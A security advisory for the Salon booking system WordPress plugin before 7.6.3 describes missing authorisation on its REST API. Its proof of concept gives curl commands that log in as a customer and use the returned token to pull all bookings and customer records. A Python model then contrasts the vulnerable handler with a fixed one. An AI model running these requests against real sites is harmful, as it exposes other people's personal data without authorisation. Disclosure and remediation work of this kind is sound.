wpexploit
Huli from Cymetrics
WPEX-ID: 5A5AB7A8-BE67-4F70-925C-9CB1EFF2FBE0
History: Mar 21, 2022 - 12:00 a.m.

Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure

data disclosure
api access
access token
customer bookings
customer data

EPSS

0.002

Percentile

58.7%

The plugin lacks proper authorisation checks on some of its REST API endpoints, which could allow any customer with an account to read all bookings and other customers' data.

Make a booking to get a customer account.

Login via the API and get an access token:
curl "https://example.com/?rest_route=/salon/api/v1/login&[email protected]&password=11111111"
Response: {"status":"OK","access_token":"5ad1d8d73d058958e98987bec31a12d25c14b9ba"}

Send requests with the customer's access token to retrieve all bookings and all customer data:
curl "http://example.com/?rest_route=/salon/api/v1/bookings/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"
curl "http://example.com/?rest_route=/salon/api/v1/customers/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"
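To make the missing check concrete, the following is an added model of the two endpoints (it is not the plugin's code): the vulnerable handler stops at validating the Access-Token, while the fixed handler scopes bookings to the token's owner and restricts the customer listing to staff. The token values, account ids, role names and record contents are constructed for the example.

```python
# Constructed sample data standing in for the plugin's tables (not real records).
# Access-Token -> (account id, role); the role names are an assumption.
TOKENS = {
    "tok-alice": (101, "customer"),
    "tok-bob": (102, "customer"),
    "tok-staff": (1, "administrator"),
}
CUSTOMERS = {101: {"id": 101, "name": "Alice"}, 102: {"id": 102, "name": "Bob"}}
BOOKINGS = [
    {"id": 1, "customer_id": 101, "service": "haircut"},
    {"id": 2, "customer_id": 102, "service": "colour"},
    {"id": 3, "customer_id": 101, "service": "trim"},
]
BOOKINGS_ROUTE = "/salon/api/v1/bookings/"
CUSTOMERS_ROUTE = "/salon/api/v1/customers/"


def authenticate(headers):
    """Resolve the Access-Token header to (account id, role), or None if unknown."""
    return TOKENS.get(headers.get("Access-Token", ""))


def handle_vulnerable(route, headers):
    """Behaviour the advisory describes: authentication only, no authorization."""
    if authenticate(headers) is None:
        return 401, {"status": "ERROR"}
    if route == BOOKINGS_ROUTE:
        return 200, BOOKINGS  # every booking, regardless of who asks
    if route == CUSTOMERS_ROUTE:
        return 200, list(CUSTOMERS.values())  # every customer record
    return 404, {"status": "ERROR"}


def handle_fixed(route, headers):
    """Authentication plus authorization: scope rows by owner, gate by role."""
    ident = authenticate(headers)
    if ident is None:
        return 401, {"status": "ERROR"}
    account_id, role = ident
    is_staff = role == "administrator"
    if route == BOOKINGS_ROUTE:
        # A customer only ever sees rows they own; staff see the full list.
        rows = [b for b in BOOKINGS if is_staff or b["customer_id"] == account_id]
        return 200, rows
    if route == CUSTOMERS_ROUTE:
        if not is_staff:  # the customer directory is staff-only
            return 403, {"status": "ERROR"}
        return 200, list(CUSTOMERS.values())
    return 404, {"status": "ERROR"}
```

In the real plugin the same ownership filter and role gate belong in the REST route's permission and callback logic, so a customer token can never enumerate other customers' records.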

